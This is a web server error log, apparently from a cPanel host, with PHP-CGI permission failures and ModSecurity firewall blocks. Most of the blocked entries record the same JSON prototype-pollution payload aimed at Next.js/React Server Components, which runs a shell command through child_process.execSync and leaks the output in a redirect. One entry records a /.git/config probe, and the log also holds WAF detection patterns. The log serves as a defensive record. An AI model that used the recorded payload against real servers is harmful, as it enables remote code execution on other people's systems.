[core:error] [pid 7725:tid 7776] [client 204.76.203.25:58940] End of script output before headers: index.php [Sun Mar 01 16:17:23.539001 2026] [:error] [pid 8115:tid 8128] [client 74.7.227.157:33018] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Sun Mar 01 16:17:23.539114 2026] [:error] [pid 8115:tid 8128] [client 74.7.227.157:33018] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Sun Mar 01 16:17:23.539132 2026] [core:error] [pid 8115:tid 8128] [client 74.7.227.157:33018] End of script output before headers: index.php [Sun Mar 01 19:36:52.641120 2026] [:error] [pid 11053:tid 11145] [client 197.58.166.204:65283] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Sun Mar 01 19:36:52.641233 2026] [:error] [pid 11053:tid 11145] [client 197.58.166.204:65283] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Sun Mar 01 19:36:52.641247 2026] [core:error] [pid 11053:tid 11145] [client 197.58.166.204:65283] End of script output before headers: index.php [Sun Mar 01 19:36:52.646814 2026] [:error] [pid 11400:tid 11402] [client 197.58.166.204:65280] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Sun Mar 01 19:36:52.646927 2026] [:error] [pid 11400:tid 11402] [client 197.58.166.204:65280] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Sun Mar 01 19:36:52.646940 2026] [core:error] [pid 11400:tid 11402] [client 197.58.166.204:65280] End of script output before headers: index.php [Sun Mar 01 20:07:43.081365 2026] [:error] [pid 11400:tid 11406] [client 195.178.110.157:41384] SoftException in Application.cpp:570: Could not execute script "/home/id/dev-unit.com/devweb-lastV/public/index.php" [Sun Mar 01 20:07:43.081478 2026] [:error] [pid 11400:tid 11406] [client 195.178.110.157:41384] Caused by SystemException in API_Linux.cpp:444: execve() for program "/opt/alt/php72/usr/bin/php-cgi" failed: Permission denied [Sun Mar 01 20:07:43.081490 2026] [core:error] [pid 11400:tid 11406] [client 195.178.110.157:41384] End of script output before headers: index.php [Tue Mar 03 23:51:52.835671 2026] [:error] [pid 1563:tid 1599] [client 194.180.48.253:60530] [client 194.180.48.253] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-20239"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.web.dev-unit.com"] [uri "/.git/config"] [unique_id "aadX-DhOO64VNuZy2gAOAwAAAdM"] [Thu Mar 05 11:20:37.809949 2026] [:error] [pid 20109:tid 20188] [client 54.233.3.120:48266] [client 54.233.3.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "aalK5Z0_-PRvUvfCZODz8gAAAJc"] [Thu Mar 05 11:20:38.016302 2026] [:error] [pid 20109:tid 20159] [client 54.233.3.120:48266] [client 54.233.3.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "aalK5p0_-PRvUvfCZODz8wAAAIY"] [Thu Mar 05 11:20:38.233531 2026] [:error] [pid 20109:tid 20155] [client 54.233.3.120:48266] [client 54.233.3.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "aalK5p0_-PRvUvfCZODz9AAAAIQ"] [Thu Mar 05 11:32:32.942673 2026] [:error] [pid 20108:tid 20181] [client 13.203.74.246:37882] [client 13.203.74.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "aalNsN2SPDspj_vhVJVtIAAAAFc"] [Thu Mar 05 11:32:33.081764 2026] [:error] [pid 20108:tid 20156] [client 13.203.74.246:37882] [client 13.203.74.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "aalNsd2SPDspj_vhVJVtIgAAAEw"] [Thu Mar 05 11:32:33.227652 2026] [:error] [pid 20108:tid 20151] [client 13.203.74.246:37882] [client 13.203.74.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.web.dev-unit.com"] [uri "/en"] [unique_id "aalNsd2SPDspj_vhVJVtIwAAAEk"] [Sun Mar 08 05:08:16.259828 2026] [:error] [pid 13471:tid 13494] [client 18.237.216.227:36728] [client 18.237.216.227] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "aazoIL8gLDtA4xTIJqDfEQAAABM"] [Sun Mar 08 05:08:16.418747 2026] [:error] [pid 13471:tid 13476] [client 18.237.216.227:36728] [client 18.237.216.227] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "aazoIL8gLDtA4xTIJqDfEgAAAAE"] [Sun Mar 08 05:08:16.657357 2026] [:error] [pid 13471:tid 13485] [client 18.237.216.227:36728] [client 18.237.216.227] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "aazoIL8gLDtA4xTIJqDfEwAAAAo"] [Tue Mar 10 15:21:58.404474 2026] [:error] [pid 10026:tid 10041] [client 18.188.27.4:48566] [client 18.188.27.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "abAa9ncalDvAPD3jRjL5UgAAAM0"] [Tue Mar 10 15:21:58.503988 2026] [:error] [pid 10026:tid 10043] [client 18.188.27.4:48566] [client 18.188.27.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "abAa9ncalDvAPD3jRjL5VAAAAM8"] [Tue Mar 10 15:21:58.611474 2026] [:error] [pid 10026:tid 10037] [client 18.188.27.4:48566] [client 18.188.27.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "abAa9ncalDvAPD3jRjL5VQAAAMk"] [Thu Mar 12 13:13:48.345464 2026] [:error] [pid 808:tid 824] [client 54.177.246.183:40558] [client 54.177.246.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "abKf7MPmow5JZ74Q0YJqVQAAAMY"] [Thu Mar 12 13:13:48.510001 2026] [:error] [pid 808:tid 823] [client 54.177.246.183:40558] [client 54.177.246.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "abKf7MPmow5JZ74Q0YJqVgAAAMU"] [Thu Mar 12 13:13:48.681872 2026] [:error] [pid 808:tid 834] [client 54.177.246.183:40558] [client 54.177.246.183] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "abKf7MPmow5JZ74Q0YJqVwAAANA"] [Thu Mar 12 19:41:25.375560 2026] [:error] [pid 808:tid 841] [client 54.151.100.144:34970] [client 54.151.100.144] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "abL6xcPmow5JZ74Q0YLM6AAAANc"] [Thu Mar 12 19:41:25.539546 2026] [:error] [pid 808:tid 824] [client 54.151.100.144:34970] [client 54.151.100.144] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "web.dev-unit.com"] [uri "/en"] [unique_id "abL6xcPmow5JZ74Q0YLM6QAAAMY"] [Thu Mar 12 19:41:25.711041 2026] [:error] [pid 808:tid 827] [client 54.151.100.144:34970] [client 54.151.100.144] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file 